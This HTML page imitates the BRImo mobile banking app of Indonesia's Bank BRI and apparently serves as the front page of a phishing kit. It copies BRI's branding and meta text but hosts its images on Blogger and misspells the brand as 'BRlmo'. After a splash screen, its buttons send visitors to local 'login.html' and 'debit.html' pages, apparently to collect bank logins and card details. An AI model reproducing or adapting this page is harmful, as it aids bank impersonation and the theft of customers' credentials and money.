<html lang="id">
 <head> 
  <meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
    <meta name="theme-color" content="#0f78cb">
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta name="description"
        content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ...">
    <link rel="canonical" href="https://www.bri.co.id" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="BRlmo - Bank BRI" />
    <meta name="twitter:title" content="BRlmo - Bank BRI" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
    <title>Home - Bank BRI | Melayani Dengan Setulus Hati</title>
     <meta content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTnHO5Pe0HSLULbxQL6sx15vXi6joLaECqj_g&usqp=CAU" property="og:image">
    <meta property="og:description"
        content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <meta name="twitter:description"
        content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <link rel="image_src"
        href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
      <link href="https://bri.co.id/o/bri-corporate-theme/images/favicon.ico" rel="icon" />
        <link data-senna-track="temporary" href="https://bri.co.id" hreflang="x-default" rel="alternate" />
        	<link data-senna-track="temporary" href="https://bri.co.id/en" hreflang="en-US" rel="alternate" />
        		<link data-senna-track="temporary" href="https://bri.co.id/en" hreflang="en-US" rel="alternate" />
        		<link data-senna-track="temporary" href="https://bri.co.id" rel="canonical" />
    <link rel="canonical" href="https://bri.co.id/" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="BRlmo - Bank BRI" />
    <meta name="twitter:title" content="BRlmo - Bank BRI" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
    <meta property="og:url" content="https:https://www.bri.co.id" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
  <style>
  html,
body {
  align-items: center;
 
  box-sizing: border-box;
  
  cursor: default;
  display: flex;
  background: #fff;
  height: 100%;
  justify-content: center;
  margin: 0;
  width: 100%;
  -webkit-tap-highlight-color: transparent;
  -webkit-touch-callout: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}

* {
  box-sizing: inherit;
  cursor: inherit;
  transition-duration: 0.2s;
  transition-property: none;
  transition-timing-function: cubic-bezier(0.42, 0, 0.58, 1);
}
  
 * {
  box-sizing: border-box;
  scrollbar-color: transparent transparent; /* thumb and track color */
  scrollbar-width: 0px;
}

*::-webkit-scrollbar {
  width: 0;
}

*::-webkit-scrollbar-track {
  background: transparent;
}

*::-webkit-scrollbar-thumb {
  background-color: #fff;
  border: none;
}

* {
  -ms-overflow-style: none;
}

ol, li {
  list-style: none;
  margin: 0;
  padding: 0;
}

.carousel {
  position: absolute;
  background-color: #fff;
  padding-top:0%;
  top: 0;
  right: 0;
  left: 0;
  margin: 1px auto;
  perspective: 200px;
}

.carousel__viewport {
  position: absolute;
  width: 100%;
  top: 0;
  background-color: #fff;
  right: 0;
  bottom: 0;
  left: 0;
  height: 534px;
  display: flex;
  overflow-x: scroll;
  counter-reset: item;
  margin: 1px auto;
 
  scroll-behavior: smooth;
  scroll-snap-type: x mandatory;
}

.carousel__slide {
  position: relative;
  flex: 0 0 100%;
  width: 100%;
  height: 78%;
  margin-left: 10px;
  background-color: #fff;
  counter-increment: item;
  z-index: 99999999;
}

.carousel__slide:nth-child(even) {
  background-color: #fff;
}

.carousel__slide:before {
  content: counter(item);
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate3d(-50%,-40%,70px);
  color: #000;
  font-size: 2em;
  background-color: #fff;
}

.carousel__snapper {
  position: relative;
  top: 0;
  left: 0;
  right: 0;
  bottom: 20;
  width: 100%;
  height: 530px;
  scroll-snap-align: center;
  background-color: #fff;
  
  
}

@media (hover: hover) {
  .carousel__snapper {
    animation-name: tonext, snap;
    animation-timing-function: ease;
    animation-duration: 4s;
    animation-iteration-count: infinite;
  }

  .carousel__slide:last-child .carousel__snapper {
    animation-name: tostart, snap;
  }
}

@media (prefers-reduced-motion: reduce) {
  .carousel__snapper {
    animation-name: none;
  }
}

.carousel:hover .carousel__snapper,
.carousel:focus-within .carousel__snapper {
  animation-name: none;
}

.carousel__navigation {
  position: absolute;
  right: 0;
  bottom: 0;
  left: 0;
  text-align: center;
}

.carousel__navigation-list,
.carousel__navigation-item {
  display: inline-block;
}

.carousel__navigation-button {
  display: inline-block;
  width: 0.8rem;
  height: 1.0rem;
  background-color: #000;
  background-clip: red;
  margin: 10px -20;
  border: 0.2rem solid blue;
  border-radius: 50%;
  font-size: 0;
  position: relative;
  top: -2px;
  margin-left: -10px;
  text-align: center;
  transition: transform 0.1s;
}

.carousel::before,
.carousel::after,
.carousel__prev,
.carousel__next {
  position: absolute;
  top: 0;
  margin-top: 37.5%;
  width: 0;
  height: 0;
  transform: translateY(-50%);
  border-radius: 50%;
  font-size: 0;
  outline: 0;
  opacity: 0.0;
}

.carousel::before,
.carousel__prev {
  left: -1rem;
}

.carousel::after,
.carousel__next {
  right: 0rem;
}

.carousel::before,
.carousel::after {
  content: '';
  z-index: 1;
  background-color: #fff;
  background-size: 1.5rem 1.5rem;
  background-repeat: no-repeat;
  background-position: center center;
  color: #000;
  font-size: 2.5rem;
  line-height: 4rem;
  text-align: center;
  pointer-events: none;
}

.btn-punya {
            font-family: 'Open Sans', sans-serif;
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px;
           margin-bottom: -67px;
            cursor: pointer;
            background: none rgb(0, 134, 224);
            border: none;
            text-align: center;
            height: 47px;
            width: 90%;
            max-width: 95%;
            font-family: Arial;
            font-size: 14px;
            font-weight: bold;
            color: rgb(255, 255, 255);
            letter-spacing: 1px;
            line-height: 1;
            border-radius: 5px;
            box-shadow: 3px 3px 4px 0px rgba(0,0,0,0.41);
            transition: background 200ms ease 0s;
            margin-top: 5px;
        }
.btn-belum {
            font-family: 'Open Sans', sans-serif;
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px;
           margin-bottom: -7px;
            cursor: pointer;
            background: white;
            border: 2px solid rgb(0, 134, 224);
            text-align: center;
            height: 47px;
            width: 90%;
            max-width: 95%;
            font-family: Arial;
            font-size: 14px;
            font-weight: bold;
            color: rgb(0, 134, 224);
            letter-spacing: 1px;
            line-height: 1;
            border-radius: 5px;
            box-shadow: 2px 2px 2px 0px rgba(0,0,0,0.41);
            transition: background 200ms ease 0s;
        }

welalxcome {
    display: flex;
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPblTKEcJ1bkhN_6ZveUz5P9k470Uv_5xp0K9Q7GUumzTIWkzOggBtr92p1VTx6_QdCp_zImbMHHvaBW_j57hy1gdI0PDHU8gumHhe3Noc_DqAU4eyt1dtJ70ZzoVPMrkk6_xiPPJSHTwMvofSJs8RzGFS5R2r4iPQk9iv-jfrsoaLNwspVbtzIXo2/s2107/IMG_20221211_011956.jpg) no-repeat center center;
  background-position: 100% 100%;
  background-size: 100% 100%;
  z-index: 10000;

}
welalxcome img {
        width:100%;
    height: 700px;
    margin-top: -55px;
    
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

        #loading {
            width: 100%;
            height: 100%;
            display: none;
            margin: auto;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
        }

        #loading img {
            width: 300px;
            position: absolute;
            top: 5%;
            left: 0;
            right: 0;
            display: block;
            margin: auto;
        }

        #aseli {
            width: 100%;
            height: 100%;
            display: none;
            margin: auto;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            z-index: 9999;
            overflow-y: scroll;
        }
</style> 
 </head> 
 <body class="">
 <main>
 <welalxcome>
 
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:30px;width: 70px;margin-top: -30px;margin-bottom: 0px;float:center;margin-left:42%" class="talxcome">
    </div>
<section class="carousel" aria-label="Gallery" style="margin-top: 0px; text-align: center; left: 0">
  <ol class="carousel__viewport">
    <li id="carousel__slide1"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper"  style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTHqRFHGXzzDI3jNHr_j01PlIXIRzTyzlDJ41oq6_ghUzsifON7pKICIigVFRaP6XSZNbqilQNlcamLWRT_XIw8VCbewhI3HrUBQBHMzFpi_1gxBfdV1zPoUtNsrNBbCPCkZUl36_-hdKXU2MbtiG2D85tqsfiDd65EB0h144woPZQSGGQLWLtinZMbSE/s16000/IMG_20230623_202545.jpg');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; z-index: 99999999; position: relative;">
       
       
      </div>
    </li>
    <li id="carousel__slide2"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTQgUs9b7wwDOEIK18vtsJJVW7NMHNLWHYEWx3zOhfpoV-NEHH2uFPnyIA4vEiV9f_obzEf8rCsVjMVjHbtaPq8ZPFjpveqFMY7siVDiW00jSfWdwMkjPscQPZcYh1sHdts6Nre-rO2dlF2mdrSkZUKSp_AcM7Z577yzv2g1CiVbEp3ejcieGUnfQuci4/s16000/IMG_20230623_202611.jpg');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%; background-color: transparent;"></div>
      <a href="#carousel__slide1"
         class="carousel__prev">Go to previous slide</a>
      <a href="#carousel__slide3"
         class="carousel__next">Go to next slide</a>
    </li>
    <li id="carousel__slide3"
        tabindex="0"
        class="carousel__slide" style="background-color: #118EEA;">
      <div class="carousel__snapper"  style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GCNY4ZoFSgy1u3zyZglZN4FnbvKd2cc6cX7H_BncjYtmwiTq6Z9SV5d1PrPXDaitJV81MVlriNU4RMntR_xa9VRstkTL8b-uS3XXvD2V19ilqYOxYj2PJMlRPFSn9em2mCWqPQbCLuWEpjMH6w5rEvLJ20g97HgjYH3TNNO8PVxdctfjtTkOdoJPC6M/s16000/IMG_20230623_202556.jpg');
      background-position: 100% 100%;
      background-repeat: no-repeat;
      background-size: 100% 100%;">
       
       
      </div>
    </li>
   
  </ol>
  <aside class="carousel__navigation">
    <ol class="carousel__navigation-list">
      <li class="carousel__navigation-item">
        <a href="#carousel__slide1"
           class="carousel__navigation-button">Go to slide 1</a>
      </li>
      <li class="carousel__navigation-item">
        <a href="#carousel__slide2"
           class="carousel__navigation-button">Go to slide 2</a>
      </li>
      <li class="carousel__navigation-item">
        <a href="#carousel__slide3"
           class="carousel__navigation-button">Go to slide 3</a>
      </li>
      <li class="carousel__navigation-item">
        
    </ol>
  </aside>
</section>
<div style="position: fixed; left: 0; right: 0; bottom: 0; width: 100%; height: 145px; background: transparent">

<button type="button" class="btn-punya">Punya Akun BRImo</button>
<button type="button" class="btn-belum" onclick="location.href='./debit.html';">Belum punya Akun BRImo</button>
</div>
    <div id="loading">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWd6BTdqKohGDhFlG8gnaY-UhLJlR9KV6omzsNkwEMuO56pAezyOK8BYAU0uCuuc1csDVIQGWVz_7ghSt7VllnA9dBTdU5Nruyc5dExInXQzPKvn_lP6IQh2jY_nUJpuyyBYDu8PjH-kfzXSUuY4eIl0HcrpMjUNvoi9JmMmfTx5AfiUbfm_mvEra_/s1067/ezgif.com-gif-maker%20(10).gif"
            alt="">
    </div>
    <div id="aseli"></div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous">
    </script>
<!-- partial -->
   <script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },2000)
        });
</script>
 <script>
        $(document).ready(function () {
            $(".btn-punya").on('click', function () {
                $("#loading").show();
                
                setTimeout(function () {
                    location.href ="login.html";
                }, 1000);

            });
        });
    </script>
    <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
 </body>
</html>